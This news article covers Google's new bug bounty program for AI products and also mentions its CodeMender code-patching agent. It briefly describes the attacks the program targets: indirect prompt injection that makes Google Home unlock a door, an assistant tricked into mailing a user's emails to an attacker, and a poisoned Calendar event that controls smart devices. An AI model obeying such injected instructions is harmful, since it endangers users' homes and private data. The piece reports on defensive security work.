Google has launched a new reward program dedicated to uncovering security vulnerabilities in its artificial intelligence products, expanding its long-running bug bounty efforts into the fast-evolving world of AI safety.
The program, announced Monday, focuses on identifying “rogue actions” — situations where AI systems can be manipulated into performing unintended or harmful tasks. Google shared several examples of the types of exploits it’s targeting, such as indirect prompt injections that could trick Google Home into unlocking a door, or a data exfiltration attack that prompts an AI assistant to summarize a user’s emails and send them to an attacker’s account.
The new initiative defines what constitutes an AI-specific vulnerability, emphasizing security loopholes caused by large language models or generative AI systems. These range from modifying user data without consent to exploiting integrations with other Google services. One previously reported flaw, for instance, showed that a poisoned Google Calendar event could trigger connected smart devices to open shutters or turn off lights.
Over the past two years, Google says AI researchers have earned more than $430,000 by helping identify ways bad actors could exploit AI features across its products. However, the company clarifies that simply getting an AI model like Gemini to hallucinate or generate incorrect information does not qualify for a reward. Instead, issues related to AI-generated content, such as hate speech or copyright violations, should be submitted via the product’s feedback channels, where Google’s AI safety teams can review them for long-term model improvements.
Alongside the new bounty program, Google also introduced CodeMender, an AI agent designed to automatically patch vulnerable code. According to the company, CodeMender has already contributed 72 security fixes to open-source projects, all reviewed and approved by human researchers.
Under the new rules, bug hunters can earn up to $20,000 for identifying rogue AI actions affecting Google’s flagship products like Search, Gemini Apps, Gmail, and Drive. Exceptional reports may qualify for bonus multipliers and novelty rewards, pushing the total to as much as $30,000. Lower rewards will be offered for vulnerabilities in smaller Google products, such as NotebookLM or Jules, or for lesser exploits like leaking secret model parameters.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
By formally expanding its bug bounty scope to AI systems, Google aims to balance innovation with security, ensuring that as its generative tools grow smarter, they also remain safe from abuse.
